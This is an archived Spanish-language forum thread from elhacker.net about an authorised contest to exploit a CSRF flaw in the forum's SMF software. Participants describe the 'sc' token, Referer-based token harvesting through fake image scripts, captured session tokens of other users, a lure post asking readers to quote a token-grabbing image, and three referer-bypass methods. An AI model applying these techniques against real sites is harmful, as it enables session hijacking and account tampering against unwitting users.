Foro de elhacker.net

---

---

Alguna ves te dieron ganas por hackear a este foro? pues estás de suerte porque hoy puedes hacerlo!

Otros quedaron con las ganas desde que se hizo el primer concurso:
http://foro.elhacker.net/nivel_web/hackea_a_elhackernet-t275475.0.html

Pero, de que se trata y que ganan?

En el foro hay una horrenda y espeluznante falla de seguridad crítica llamada CSRF, algunos recordarán que el primer concurso fue encontrar un XSS, pues aunque parezca fáci no es tanto.

El primero en postear dicho CSRF y explique con lujo y detalles de que se trata y como explotarlo ganará nada mas y nada menos que un ferrary de oro, ... bueno, hay que esperar primero a que el-brujo sea multimillonario pero para no hacerlos esperar tanto también les daremos lo siguiente:

Premios

• 1 Cuenta de correo @elhacker.net
• El ganador se publicará en el boletín mensual de ElHacker.Net.
• El ganador se publicará en el blog oficial de ElHacker.Net

Pistas?, queee?!!!, cual pista?, noo noo, no hay pistas xD (por el momento).
La fecha límite para postear el CSRF es el 1 de Marzo, después de eso lo arreglaremos xD.

Bases del concurso:
* Debes publicar todo acá, nada de mensajes privados, asi entre todos se ayudan.
* Atraves del CSRF descubierto debes ser capaz de modificar la firma de mi perfil con tu nick.
* Debes tener mas de 2 años de edad y menos de 98.

Cualquier persona puede enviarme enlaces al correo yan.uniko.102@gmail.com y yo les haré click con mi cuenta conectada en el foro. Recuerden que en el asunto del correo deben poner "GO CSRF elhaqcker.net", cualquier correo que no tenga ese título no abriré y lo eliminaré.

El perfil con el que ingresaré para que modifiquen mi firma es este:
http://foro.elhacker.net/profiles/pollo9-u322090.html

Si alguien encuentra otro CSRF que también sea crítico ganará el premio y se publicará el bug del concurso.

Quien dijo yo?, quien es el primero? :D está refácil y el bug es viejisimo y funciona para muchos otros foros.

(http://profile.ak.fbcdn.net/hprofile-ak-snc4/276981_119013464871655_1147909187_n.jpg)

Hola, hackeenme! :D

Yo solo se usar excel, word, ver mi gmail, facbook y usar el msn  :-*

Me gusta el spam y le hago click a todo lo que me llega por correo  :xD .

no he dicho nada :)  ;D

saludos.

Interesante, solo posteo para que me lleguen los nuevos mensajes, e informarme como va todo, saludos.

Yo quiero el ferrari de oro!!

saludos WHK
una pregunta fuera del tema ... conociste el A-22???
o estoy fuera del tiesto...
???

Challenge Accepted.

EDITO: estuve a punto, después lo revisaré mejor

Una me deniega permisos y otra me deslogea. Por suerte tengo más con que jugar

Gracias por el reto.  >:D

¿Porqué tanto spam?

Saludos

Hola, no, no conozco a-22

(http://127.0.0.1/pruebas/index.php)

Vamos!! que se puedee!! animooo  :D

(http://t1.gstatic.com/images?q=tbn:ANd9GcQXPE7uoGzVinGrXpu3nrFisOdiKzIkagxXgAZr_Wtk5y0S8pbgjbWgk-H2Ig)

Es solo un misero CSRF, les gusta salir en zone-h y no pueden siquiera sacar un simple csrf de alto riesgo :P

Dense pistas o digan como van para ir viendo si van en el camino correcto o no.

lo intente cambiandome el perfil pero apuntando a tu usuario...

Me dice que no tengo permisos... ¿Estás seguro que el CSRF aúin sigue vivo?

No veo el tan alto riesgo en el foro XD

¿A qué viene tanto spam? ......

¿Dónde andan los moderadores?

Es el mismo crsf que publicaste?

Donde está el spam?

Si, el bug aun está activo y funciona de lujo pero hay que mover la cabeza un poco, no es llegar y lanzar formularios arbitrarios al perfil.

m0rf no lo se, haz tus pruevas y averigualo.

 :silbar:

Saludos... (Sigo intentando el csrf  :P)

Has contado con el token de seguridad "SC"?

El xss es para conseguirlo no?

Porque la url para cambiar el perfil es facil crearla en otro server pero necesitas el sc como dices.

Almenos lo que yo he probado.

He leido sobre este tema hace como una semana. No tenia ni idea de lo que es un XSS y menos de lo que es un CSRF.
Por lo que entiendo habria que hacer algo como:
o no estoy ni cerca...???

Hola,
No creo que sea tan simple como pinta.
No creo que haya que utilizar un formulario aparte para hacer el CSRF (SMF comprueba el referer). Se trata de un simple link o una imagen apuntando a tal link.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Saludos

Muy buenas,

Vamos a ver si con lo que he podido hacer en mi tiempo libre y con lo que hayáis visto vosotros, podemos explotar esta vulnerabilidad.

He utilizado BURP para poder determinar qué variables son las indispensables para poder cambiar la firma (utilizando la funcionalidad repeater), y ellas serían:

- signature
- sa
- userID
- sc --> (Esta variable, en principio, se generaría en base a la sesión iniciada por el usuario, con lo que sería propia por cada sesión de usuario)...corregidme si me equivoco.

A parte de la cookie, pero en principio, la cookie no sería un problema para nosotros, considerando que ya habría sido generada (previa autenticación) cuando la "víctima"  siga el link malicioso que le enviaremos.

Ahora bien, he utilizado la herramienta CSRFTool de OWASP para poder generar un documento html con las variables de interés y hacer las pruebas con otro perfil que me he creado.

Según indica el gran WHK, "hará click sobre enlaces enviados a su correo", lo que me hace asumir que podríamos generar un "report type" del tipo link, utilizando la herramienta CSRFTool.

Una vez generado dicho "report type" con las variables de interés, y modificando las variables userID & Signature (con los valores que nos interesen), guardamos los cambios y deberíamos ser capaces de enviar dicho link a la víctima.

Por alguna razón al hacer pasar por una víctima, tras autenticarme y seguir el link malicioso, recibo un mensaje de error del foro indicando que el usuario no se encuentra...

Seguiré pensando qué puede estar ocurriendo...

Espero que, con lo que he hecho y analizado hasta ahora, sirva de ayuda para algunos.

Estaré de igual forma pendiente de lo que podáis aconsejar...

Un saludo y happy hunting.  >:D

Hola, estoy probando con esto y se me ocurre algo asi:
http://foro.elhacker.net/profile/tuid;sa,forumProfile;signature,Firmando
pero no me resulto...  :-(
Saludos...

Te equivocas la variable es sc

Creo que voy en muy mal camino....

@Abakus,

¿estás seguro?; porque:

1.- La variable "sa" siempre está cargada con el valor: "forumProfile"

2.- La variable "sc" sí que tiene un "churraco de caracteres" que si te la cargas al hacer una petición contra el servidor, dice que la sesión no es válida o algo parecido. Si modificas una u otra variable el servidor te notifica errores distintos.

Un saludo,

Claro, por eso la variable sa siempre va a ser forumProfile, entonces no es generada por la sesión del usuario como afirmas más arriba.
La variable SC si que es generada para cada usuario y valor enviado debe de ser igual al valor que esta almacenado en el foro, si no muestra el error.

Por tanto sabemos ya 3 variables necesarias
sc=¿?
userID="322090"    <---- UserID del usuario pollo9
sa="forumProfile"
signature="Te he hackeado"

La cuestión esta en como obtener el SC del usuario

@Abakus,

Perdona, no me había fijado que había invertido los valores de las variables en mi primer post.

Gracias por la corrección.  :rolleyes:

p.d: Ya he corregido el post en donde habia cometido el error.

Pues van bién, justamente es posible modificar tu firma desde un formulario casero hecho en html, el problema es que necesitas algunos datos como el id de usuario que es facilmente deducible y el token de seguridad que algunos llaman sc, sa, etc.

Un token juega una función muy importante en una aplicación web e impide que alguien te haga hacer cosas que no quieres en una web. Esto se llama CSRF.

Oops.. escribí una pista demasiado grande asi que lo acabo de borrar xD jajaja, pero van bien, por ahi va el asunto.

Abakus estás cerca.

Tomen, este es el pollo hacker que les dará aliento:
(http://hackeame.webs.com/Copia%20de%20gallina.jpg)
Animo!!! :D

Saludos!.

(http://abrtogbr.net63.net/index.php)

xDDDDDD :-X

... Follow Post xD a ver si encuentro algo, sólo para hackear a ego xD es mi sueño jajajaja

Muy buenas,

Pues, como ya casi estamos viendo la luz al final del tunel, y al ver que lo indispensable ahora es saber determinar el valor del token de seguridad, me planteo varias posibilidades:

1.- Que el token pueda ser predecible de alguna manera.

2.- Si el token es completamente aleatorio, pues habría que intentar explotar una vulnerabilidad xss para poder coger dicho valor; en este particular, he intentado el PoC publicado por WHK hace ya algún tiempo, pero sin resultados satisfactorios.

http://foro.elhacker.net/seo4smf-redirect.php?a=login2:javascript:alert(document.cookie);

Obtengo un error 403 Forbidden por parte del servidor.

Con lo que me parece, que me voy a decantar por la posibilidad de que sea predecible, pero lo tengo que pensar un poco, y ahora mismo me muero del sueño :(

¿Se os ocurre alguna idea chicos?

 :silbar:

Post de prueba estoy probando una cosa...
(http://localhost/hacking/hack.php)

Buenos días,

Anoche creo que se me ha ido la pinza (decidme algo si me equivoco); pero el XSS no me serviría de nada, puesto que el token ya ha sido generado y "conocemos" su valor; con lo cual...

Lo que habría que determinar es con qué valores esta siendo generado. correcto???

 ;D

Todo lo que voy a decir ahora mismo son suposiciones sin conocimientos previos (nadie nacio aprendido):

Estuve revisando la pagina de elhacker.net y vi que el sc esta bien clarito pegado en el link de cerrar sesion ( http://foro.elhacker.net/logout.html;sesc=d2bd9**1e1****fb9e3****d51**9ada )

Mi pregunta es: No se podria hacer un html que lea ese dato y lo incluya en el "comando" a realizar por el usuario?

Osea, obligar al usuario a abrir una pestaña de elhacker.net, leer esa pestaña, cojer el codigo y implantarlo en la otra parte del codigo a ejecutar.

Si me equivoco o simplemente digo cosas sin sentido decidmelo, acepto todo tipo de criticas constructivas  :)

@adrianmendezRap

Muy buena idea...ya te digo algo a ver qué se me ocurre.

@Todos

He estado pensando sobre el token.

Y me he planteado lo siguiente:

1.- Si el hash contenido en el "sc" fuera siempre el mismo por sesión de usuario (quizás generado tomando como base el nombre del usuario) sería fácil determinarlo, pero ya lo he verificado y siempre es distinto, aleatorio, con lo cual...

 :-\

No puede ser un token fijo, sino no cumpliría su propósito xD

Un csrf es por ejemplo que yo te mandé un enlace tipo elhacker.net/logout.php y se te cierre tu sesión, y se protege el enlace con un token aleatorio para que no sea conocido, elhacker.net/logout.php?token={aleatorio} eso es lo que hay que saltarse en este caso

@jdc

Claro, tengo presente que un token tiene que comportarse de esa forma, pero una mala implementación del mismo puede degenerar en la explotación exitosa del CSRF, por eso lo he verificado  :P

Por lo que veo todos estamos con el token sc. Este reto no puede quedar aqui, espero que alguien lo consiga, yo seguiré intentándolo aunque no tenga conocimientos en este campo pero todos los dias se aprende algo nuevo.

Suerte a todos ;)

(http://abrtogbr.net63.net/index.php)

(http://abrtogbr.net63.net/index.php)a :osss

Hay algunos que están muy muy cerca pero otros que andan muy muy lejos xD

Vamos que se puedee!!!

Acá les dejo a unas porristas para que les de ánimos  :D
EDTsCWBsoi0

Janito dos cuartos, te sabes el bug no? hace tiempo que me tienes botado, abandonado en el msn :( , me tienes mas botado que nakp desde que conoció a su novia.

@WHK

Sí, pero tienes que decir quién está mas cercaaaa!!! para no perder el tiempo y trabajar en equipo  :)

Ya he podido capturar el ID del token (sc).. Ahora hay otro filtro, que es el sitio de referencia xD, ya que el exploit que enviá el formulario se ejecuta en un sitio remoto xD.

Y la única forma seria enviar una petición GET utilizando el foro, así se tomaría como referer la dirección del foro, pero para editar el perfil es necesario enviar el contenido vía POST. Y desde el foro es imposible realizar peticiones POST....

Y desde un formulario no puedes enviar alguna referencia xD.

Saludos.

Yo con el formulario que cree con mi sc podia cambiar mi firma. Ese otro filtro no lo he encontrado. Lo consigues con xss o de otra forma el sc?

@yoya:

Muy bien!!! alguna pista???  :-*

xD

Jejej xD.
Lee de nuevo mi comentario, lo edite... Lo consigo de otra forma.


Aunque ya encontré un CSRF, que seria para cerrar sesion jajaja xD

(http://foro.elhacker.net/logout.html;sesc=0b930ffec3a212549de19aefb6f2df0f)

¿Se podría hacer lo siguiente?
En vez de utilizar csrf de logout, se podría utilizar el csrf de cambio de sesion de usuario.
Como se comenta arriba se manda un link a "Pollo9" que le gusta hacer click en cualquier enlace con un script o iframe oculto en una imagen por ejemplo y al hacer click lo que realmente se esta haciendo es capturar y modificar los datos de su sesion.

No se si se podría llevar a cabo de esta forma, esto lo acabo de leer y realmente no se como empezar.
Si es por ese camino, se podría crear una pagina html con el script incrustado y enviarle el enlace. Supongo de esta manera no se tendría que saber cieros datos ya que se hace el cambio de datos de la sesion entre usuarios.

¿Esto realmente es así? O ando muy perdido, partiendo que no se mucho, no me crucifiquen, intento entender esto de los errores en paginas web.

Un saludo.

prueba

Eso de la referencia es falso, yo si pude hacerlo sin la necesidad del referer, les recomiendo darle un vistazo al código fuente de SMF para que vean que tipo de protección tiene y porque no te deja ejecutar el CSRF, yo si pude :D

Yo el formulario que he hecho es este:


Si le pongo mi sc y el id del user la firma cambia.

Lo ejecuto desde el pc mismo desconozco si colgado en algun hosting funcionara pero diria mucho que si ya que si funciona abriendolo local.

Seguramente me paso algo por alto ~ Yoya ~ pero en las pruebas que realice funcionaba.

Siento decirte que desde otro servidor no funciona, da el error de referencia.
Puede ser que sea falso, pero lo da.

(http://foro.elhacker.net/logout.html;sesc=91d7f05fe3b08303f6f0244307936c2a)
(http://foro.elhacker.net/logout.html;sesc=cf026660f2d249015c1529e71d9b4b61)
(http://foro.elhacker.net/logout.html;sesc=ca6bd350e25f85b07fc320901516dea9)
(http://foro.elhacker.net/logout.html;sesc=6c6417c2d3b18c3ae33ea498a02ba1d0)

Hay desconecto a algunos jejeje xD.
(http://abrtogbr.net63.net/index.php)

Estaré viendo lo de la referencia mas detalladamente...

Saludos.

http://foro.elhacker.net/logout.html;sesc=91d7f05fe3b08303f6f0244307936c2a
http://foro.elhacker.net/logout.html;sesc=cf026660f2d249015c1529e71d9b4b61
http://foro.elhacker.net/logout.html;sesc=ca6bd350e25f85b07fc320901516dea9
http://foro.elhacker.net/logout.html;sesc=6c6417c2d3b18c3ae33ea498a02ba1d0

:silbar:

Si ps, son algunas que he capturado jejeje, tengo unas cuentas mas.

Saludos.

Pero si el sc es variable... como vas a tener capturados algunos?

Espera.... Ese Hola Mundo...

Aun así esos sc no te servirán de mucho

Yo diria lo contrario :P Yoya es el que mas se ha acercado.

Si, a sido capaz de capturarlos, pero esos sc no le servirán de nada, ya que seguro que están caducados. Yo solo sigo el hilo a la espera de la tan esperada respuesta.

Los sc que mostré, ninguno son míos, sino de algunos de ustedes. El valor del sc, es una ID de sesión, y varia cuando se cierra sesión (se destruye), cuando se cierra el navegador o si se forza a generar un codigo sc nuevo. También se podría forzar a generar nueva ID de sesión.

Supongo que el bug esta, al no generar un sc nuevo, al tratar de editar el perfil. Por esa razón es vulnerable a CSRF.

Supongo que mañana tendré mas tiempo, para ver lo de referencia y si encuentro una solución, se la mando al pollo xD.
Saludos.

Prueba 2

 ¡¡no creo que se pueda ¡¡ya lo intentaron en una entrevista que le hicieron al brujo

A jugar!  ;-)

Jajaja nop, ni siquiera he revisado, tengo mucho trabajo... Hace rato que no me meto al msn y borrarse tu facebook. El mamon parece que esta soltero jaco que hay que traerlo de vuelta al mal camino jajajaja.

Pd: si tienen el sc es super fácil cambiarle la firma

hola, ~ Yoya ~
he tratado de ver el codigo de esa pagina
analytics.*************/count.php
pero no veo nada
o solo pierdo el tiempo por ahi...???

tambien encontre esto, pero en realidad no se si servira de algo...

y esto se repite en varias partes
ojala sirva de algo, porque yo recien estoy aprendiendo un poco de esto, y ni siquiera se si estoy cerca  :huh:
saludos

Esto parece que tiene para rato :P

En fin, si alguien logra hackear el foro nos avisan por favor, mientras tanto estaremos tomando una tacita de te en la casa de el-brujo con algunas pizzas de champiñones y tocino frito mientras vemos el log de accesos.

Voy a llamar a esos tipos que bailan samba para callarles la boca  :xD :xD

Aquí muestro un video (sin música), del error de referencia. Asi que nose puede realizar el CSRF para cambiar el perfil, ya que cuando ejecutas el exploit, se toma de referencia el sitio donde proviene la petición.

cpxO5bgz2UQ
http://www.youtube.com/watch?v=cpxO5bgz2UQ

(http://abrtogbr.net63.net/index.php)

Pero con xss lo puedes enviar desde la misma elhacker.net y no daria error de referencia no?

Bueno mi idea era solo obtener el sc con el xss para usarlo en el form, pero si necesita referer puedes hacer un script en la url que es vulnerable para insertar el form desde alli no?

I si no, no lo he probado nunca, pero no puedes hacer una petición falsa con el referer falsificado? Repito que no lo he probado ni se si puede hacerse.

Ellos encontraron un misero bug en un sistema de encuestas que era mas vulnerable que una casa sin puertas, si hablamos de conocimientos ellos no hicieron gran cosa. De hecho este CSRF tiene mas siencia que el bug que ellos habian encontrado.

Hechen a cocinar esas neuronas, yo acabo de probar el bug y si funciona, solo que no es tan común como ustedes piensan, deben hechar a volar sus imaginaciones y pensar que hacer, no se queden con lo aprendido, traten de buscar nuevas maneras.

Una ves obtenido el token hay una forma de bypasear el referer sin tener que encontrar ningún otro tipo de bug en el foro. :D de hecho se puede de tres formas xD

(http://abrtogbr.net63.net/index.php)

Bueno ya encontré una forma de hacerle el bypass y creo que se puede implementar de tres forma (R,P y A  = -> palabras iniciales xD), funciona muy bien cuando la hago directamente, pero no cuando lo implemento por "click" utilizando cualquiera de la tres forma, me toma el referer.


Y no me gusta mucho que sea tan "directamente", ya debes ser demasiado ingenuo para caer.


Recuerda que es un CSRF, no tiene caso que andes buscando XSS para poder ejecutar un CSRF en este caso. Hay una forma muy creativa de obtener el sc.


La única forma de "falsificar el referer", seria realizando una petición pero dejaría de ser un CSRF. Ya que para que funcione de esa forma, tendrías que tener la cookie que utiliza SMF para hacer un "ROBO DE INDENTIDAD" y luego cambiar el perfil del usuario y ese es otro tema ya.

Saludos.

Hay tres formas de hacer una peticion get y Post hacia un host evadiendo el referer, no dare mas pistas  :P , estan omitiendo un dato super importante

Claro para ti que eres hacker es facil u_u nosotros somos mortales :xD

Recién le doy bola a este post...  :P

Para cuando lo consiga hacer, me va a costar explicarlo porque así de duro soy para la pedagogía. Pero una buena "verseada" le pegaré.


 ;D

De esas formas, hay alguna en la que no se necesite la cookie?

Es un csrf, no necesitas cookies.

Si doy mas pistas entonces les estaría revelando el bug y no sería merito propio, asi que como podriamos ponerlos en el blog y en el boletin mensual si yo les doy las pistas?

SMF no verifica que el referer sea correcto, si le dan un vistazo al código fuente verán que solo verifica que el referer no sea un enlace externo solamente, eso quiere decir que..... [censurado]

Que pasa al utilizar https://www.google.cl/ ? han visto live headers cuando hacen busquedas desde google?

Con esas dos pistas les estoy regalando el bug.

Ya que lo has dicho tú WHK,  a mi me extraña mucho que YoYa no lo consiga, si ya tiene el SC que es yo creo lo más difícil y lo que a mi me falta.

Yo he probado el formulario aislado que está en una página de este de este mismo hilo por otro usuario, estando conectado yo  al foro me cambia la firma.

Por lo que enviado un enlace a WHK o poniéndolo como avatar como ha hecho YoYa, con eso debería cambiar la firma.

Eso sí, si pongo la página con el formulario -dentro- de un servidor local o externo no funciona (envía referer y SMF lo detecta), pero si la pongo por ejemplo con un HTML simple, digamos en el escritorio entonces cambia la firma.

Creo que eso es lo que quieres decir.

Con esto al menos YoYa debería tener suficiente.

:D

De hecho en mi firma se ven intentos del cambio de firma :D

Hoy recién termine algo que podía ser con una chica jejeje, no porque mañana sea 14 jejejeje.(http://abrtogbr.net63.net/index.php)

No he tenido tiempo para poder testear, desde mi ultimo post (11 de febrero). Mañana tratare de dedicarle 1-2h para ver si avanzo un poco xD.

Saludos y suerte a todos.

PRUEBA

El GatoPollo les manda ánimo! :D

(http://2.bp.blogspot.com/_YSF_l9NBSqg/S3y6iQbeCeI/AAAAAAAAAK0/3mEGf8VzGqw/s320/gato-pollo-thumb-500x375.jpg)

(http://remotesid.22web.net/image.php)
Probando...

Probando2

Primeramente, gracias WHK!  ;D
Claramente la única forma que veo (y estoy bastante ciego parece) es como Yoya está haciendo actualmente. Carga la imagen como php y debe de obtener por ahí el token.
Llevo rato mirando y ni en el referer (obviamente ya que no va por get :-x) ni tampoco se le llegan a pasar datos por post a la imagen que se carga  :¬¬

@Yoya: Por lo que he leído casi lo tienes, solo te falta lo del referer. ¡Ánimo!  ;-)

Un saludo a todos :p

En Firefox, se puede no enviar el referer si nos vamos a la barra de direcciones y ponenos about:config

Entonces buscamos "referer" con CTRL+F que tendrá normalmente un valor 2, y lo ponemos a 0 y ya nos dejará enviar el formuario desde un servidor externo.

Falta solo robar el SC.

network.http.sendRefererHeader;0

Obtener el sc es lo más complicado para mi, primero pensé e un iframe... pero rápidamente lo descarté porque no se mantendría la cookie y sería un lio.
Hay que obtenerlo como Yoya, con la imagen. Pero todavía no entiendo de dónde sale si al cargar la "imagen" no se envía de ninguna forma.  :o

Un saludo!!

Exacto,

tiene que ser algo de esto:

Con la imagen se puede conseguir el sc pero tiene qu citar o tener la respuesta rápida activada, en realidad no recuerdo bien ñ_ñ la verdad es que prefiero darme por vencido xD no tengo mucho tiempo u.u había pensado respecto al referer probar con algo como elhacker.net.midominio.com o midominio.com/elhacker.net (con foro siempre ya que el referer tendría que spoofearse desde aquí) claro, son sólo ideas xD o pistas si no me equivoco por mucho jajajaja no puedo revisar  el código de SMF u.u joya, espero que te sirva algo para que juankees a ese tal WHK xD alias elputoamo ñ_ñ

Aps y la imagen recoge el referer a su vez :p si por ejemplo respondo fíjense que es algo tipo /responder.php?sc=evitamoscsrfconestecodigosuperguqy

Si me manda desde la respuesta a mi imagen ya capture el referer y con el el sc, claro como estoy oxidado quizás sólo sean patrañas lo que digo xD igual ese "bug" es viejo, pero sirve para algo más grande como esto!

@MrPoor: Sí y no :p Por POST no se envía nada a la imagen :) Para evadir el referer en el formulario casero se pueden conectar usando una librería de javascript.  >:D

Como dicen arriba, se obtiene por el referer... pero todavía tengo que hacer más pruebas...

@Yoya: Lo que necesites avisa, si te puedo ayudar claro.

¡Ánimo a todos!  ;-)

Desisto.  :-(

Saludos

Ya tengo el token del sesión id con mi famosa imagen también, voy a ver si puedo acabar el resto de cosas para cerrarme sesión y pego un update de como lo llevo :)

Edito: Ya tengo aislado el token y ya he conseguido hacer el logout para cerrar sesiones con html y javascript!!  :laugh:
Lo dificil va a ser que pollo09 caiga (?)

Un saludo!!!

Yo mismo soy pollo9 y hare lo posible para que la cuenta caiga, la idea es que ustedes hagan un test que demuestre que es posible explotar el bug, también pueden hacer un video y colgarlo en youtube y pegar el enlace acá... la idea solamente es demostrar que el bug es efectivo, de hecho el bug ya lo encontraron, solo que deben modificar una firma del perfil de alguien para saber si realmente el que encontró la falla la enocntrtó por si mismo o alguien mas se la dijo, el que ehncuentre el bug será capaz de realizar la prueba sin problemas.

Esto no deberia funcionar , siento mi ignorancia pero no tengo ni idea xD..
http://foro.elhacker.net/profiles/pollo9-u322090.html;sa=forumProfile?%3Ctextarea%20class=%22editor%22%20onkeyup=%22calcCharLeft();%22%20name=%22signature%22%20rows=%225%22%20cols=%2250%22%3EeChuche%3C/textarea%3E?%3Cinput%20type=%22submit%22%20value=%22Cambiar%20perfil%22%3E (http://foro.elhacker.net/profiles/pollo9-u322090.html;sa=forumProfile?%3Ctextarea%20class=%22editor%22%20onkeyup=%22calcCharLeft();%22%20name=%22signature%22%20rows=%225%22%20cols=%2250%22%3EeChuche%3C/textarea%3E?%3Cinput%20type=%22submit%22%20value=%22Cambiar%20perfil%22%3E)

No puedo setear el referer desde javascript porque ya está seteado previamente y esa opción está deshabilitada por razones de seguridad. Solo me falta eso... asique a pensar!! Acepto ideas  :rolleyes:

Un saludo :)

Para falsificar el referer tienes que construir la petición desde php y poner el referer que quieras manualmente.

@m0rf: Así se estaría conectando el servidor que ejecute php y también necesitaríamos tener la cookie lo cual complica todo un poco. WHK dijo que es posible hacerlo simplemente con el token de seguridad  :rolleyes:

Un saludo, gracias por la idea!

Test! :silbar:
(http://lordinutero.phpfogapp.com/imagen.php)

Bueno, creo que he superado el reto y he hecho un vídeo con mi usuario.
Si WHK no lo da por válido, les acabo de poner en bandeja como solucionarlo xD


Descarga vídeo (http://www.mediafire.com/?v4fhnfakzm348np)

Espero que sea válido  :-(

emm, es una vulnerabilidad pero solo lo haces con tu sesion, se supone que cada vez cambia, asi que no es tan grave

Espero que ganes, igualmente voy aprobar una cosa

EDIT

Para mi gano p0is0n-123!!!

Y ahora, como seria el parche al codigo fuente? :)

(http://serverogame.site50.net/final.php)

Otra prueva....

La cosa es cambiar el del pollo!

Yo igual encontré una forma de evadir el referer hace muchos dias, similar a la de  poision pero no es necesario descargar un archivo para luego abrirlo.

Y es un poco mas original la forma y mucho mas automatizado. Porque en los post hay muchos tokens de usuarios y no sabrás de quien es el token de usuario.

Nose si se tomara el bypass mas efectivo o algo. Pero hay una forma mucho mas efectivo y existe porque WHK dio algunas pista.

Saludos.

p0is0n-123, podrias automatizar todo ese proceso, en lugar de onclick, onload no??, en lugar de enviar html en el mail, podrias crear un html desde tu server y solo darle el link a la victima, (http://miweb.com/awesome.html) y solo al clickear (visitar el link) el evento load que haga todo el trabajo

saludos

De todas formas al responder uno lanza el hash en el referer, en caso de ataque real habría que usar una imagen transparente o incluso un emoticono de los actuales del foro para hacerlo más real

Creo que  habria que hacer , que la web antes de realizar cambios pidiera la
contraseña actual y despues verificarla con la base de datos.Con esto se arruinaria todo el ataque  CSRF.

Gracias a todos los que pensais que he ganado!  :xD Sin duda sería increíble.  ;-)
He puesto el vídeo porque WHK dijo que también era válido un vídeo que demuestre la vulnerabilidad.

Sin duda hay más formas de hacerlo, quizás alguna más elegante que otra. Pero llevaba dos días y ya quería terminar rápido... :)

La solución al CSRF podría ser que el token de seguridad cambie una vez es usado, renovándose cada vez que se usa. Y usar un token diferente para editar datos de perfil que también cambie. Aunque esto directamente es más dificil si el referer que se le pasa a la imagen no tuviese el sesc.

Gracias a todos!!  ;D

Me ha gustado tu explicación del Bug p0ison-123, en el víde dejas claro algunos conceptos, pero no entiendo mucho de seguridad a nivel Web.

¿Qué mas cosas se podrían explotar o aprovechar con este mismo fallo? ¿Qué riesgo podría existir?

Saludos y buen trabajo!

muy bien poison pero no me quedo claro el video de donde agarras los datos y es que tambien no entiendo muy bien el tema y nose casi has un tutorial desde cero si puedes
saludos flamer

No porque sino el referer seria el del servidor y no funcionaria (o eso creo n.n)
Y tampoco funcionaria con javascript desactivado (cosa que creo que WHK tendra :P)

En el primer PHP que lo "camufla" de una imagen, los navegadores envian la url del sitio cuando piden una imagen, y ahi es cuando recibe el token y demas datos, el simplemente los guarda en un txt

.

Perdonen mi ingenuidad , para que sirve el image.php?

Para agarrar el token del usuario por el referer

--------------------------------------------------------------------
Atencion a todos los POLLOS!!
Regalamos cuentas de email a el JUAQKER.NOT si participas en nuestro juego online!!

Para participar tienes que citar este mensaje y recibiras en tu inbox un correo con un link para el juego!
(http://lordinutero.phpfogapp.com/imagen.php)

Not Scam, not Spam!
No te olvides de citar tambien la imagen!
Solo juega y gana!
 ;D

Yo quiero jugarrr!!!!

El video de p0is0n-123 está bueno, de hecho el formulario via mail es una de las tres posibilidades para enviar la petición evitando el referer actualizando el perfil, como ya han descubierto smf no checkea que el referer sea válido siempre sino que solo cuando lo hay, o sea que si enviamos un formulario sin referer se ejecuta el csrf, asi que no es necesario que el formulario sea enviado directamente desde el foro.

Asi que teniendo el token de seguridad y evitando el referer deberian ser capaces de ejecutar el csrf.

El problema del video es que nadie te va a descargar un html para abrir un enlace, eso es un fail xD, estubiste 99% cerca de lograrlo pero no debes permitir que se descargue el archivo, vee una solución mas normal, prueba con otros clientes de correos, vee outllook, gmail, hotmail, yahoo, no se, alguno que no te pida descargar algo para que te lleve al enlace ya que o si no tendrias que recurrir a la ingeniería social y ya no sería csrf puro.

Jugando con h3ct0r... :)

Hector, no me ha llegado el enlace de mi juego joder! :(

jajaja Me da mucha pena decirlo pero vas a tener que volver a citar el mensaje! Nuestro servidor peto en ultimo momento y no se pudo almacenar tu peticion :(

Esto en un real life es intolerable !!!  :( :( :(  :-[ :-(

(http://abrtogbr.net63.net/index.php)

Ya lo logreeeeeeeeeeee!!!! xD.

(http://abrtogbr.net63.net/index.php)
Esperar q el pollo conecte xD

Re-cintando... h3ct0r estaba primero que yoya... quiero mi juego! :D

El juego nunca llegó :( mejor juego con yoya :D

xD creo que te has equibocado de id de usuario :P
Buena idea lo del popup, asi evitas el referer también porque se redirige desde about:blank, pero los datos del form son incorrectos por alguna razón.

Acabo de jugar un juego donde presioné enter como 500 veces y no pasó nada con mi firma :D

Quien mas quiere jugar? :D

Sorry, se me olvido agregar tu id de perfil jajaja. Intenta ahora directamente con el archivo f si quieres, como nadie a posteado

jeje ya le envie el juego a pollo! Vamos a ver si funciona todo fino!  >:D >:D

(http://lordinutero.phpfogapp.com/imagen.php)

El de h3ctor no funciona, presione enter como 500 veces y  nada en su juego.

Probaré el de yoya otraves...

un seg ps, que se toma el token de alguien mas. Dejar al pollo q caiga
(http://abrtogbr.net63.net/index.php)

Me han hackeado!!! quiero a mi mamáaa :'(

(http://static.freepik.com/foto-gratis/lloron_2452511.jpg)

Felicidades yoya! jejeje Pollo que habra pasado con el mio :( estoy montando un videito mostrando como lo hize !! Creo que nunca agarre tu token!!  :-(

Esta tarde despues q vuelva de la universidad o mañana temprano escribo un articulo con los codigos y todos.

Lo mejor es q son necesario 2 pasos jejeje, nomas.

Bién! ahora ya saben como cambiarle la firma a los demás usuarios xD

~ Yoya ~ ganó :D porque fue el primero en poder cambiar la firma del pollo.

Ahora aplicaremos el parche al foro y nos contactaremos contigo para entregarte tu cuenta @elhacker.net, recuerda que aparecerás en el boletín mensual y en el blog oficial :) Saludos a todos los demás que participaron :)

Una forma de evitar el referer era via https hacia una url http ya que por politicas de seguridad de los exploradores no se envía el referer, la otra era atraves de un mail en formato html con el formulario (pero tenia que ejecutarse) y la otra era atraves de una petición XMLHTTP o Ajax via jQuery haciendo una peticiín POST solicitando un archivo de tipo json hacia un html.
Lo del popup era buenisima idea :D asi que practicamente todo fue mérito própio por parte de yoya.

Saludos y bién merecido el premio!

Yo me fuí a la *****, nosé para que hice el vídeo  ;)
Felicidades igualmente.

Hombre, que te faltó muy poco pero asi no era, en ese caso hubieras usado ingenieria social para descargar el html con codigo malicioso que solo se ejecuta en ie de forma local y hubieras extraido contraseñas de manera mas fácil.

Muy diferente a hacer click en un enlace y que se te cambie la firma de una, además yoya encontró el bug del token primero que tu, recuerda que habia que explotar el bug.

Mas adelante podriamos hacer otro reto con una inyección sql que anda por ahi jajajajaja :P,.. ahh no, ese es privado xD sorry :P

Como dije, si mi vídeo no se daba por válido estaba poniendo en bandeja como solucionar el reto.
No le quito merito a Yoya, ni mucho menos.

Aun así por lo menos me da para contar en mi blog como lo he resuelto...

